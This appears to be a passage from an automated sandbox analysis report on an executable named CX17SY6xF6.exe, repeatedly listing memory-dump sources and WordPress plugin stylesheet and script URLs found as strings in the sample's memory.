                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/css/frontend.min.css?ver=3.3.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/preloaded-elements-handlers.min.js?
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/webpack-pro.runtime.min.js?ver=3.3.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/lib/sticky/jquery.sticky.min.js?ver=3.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.8
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=
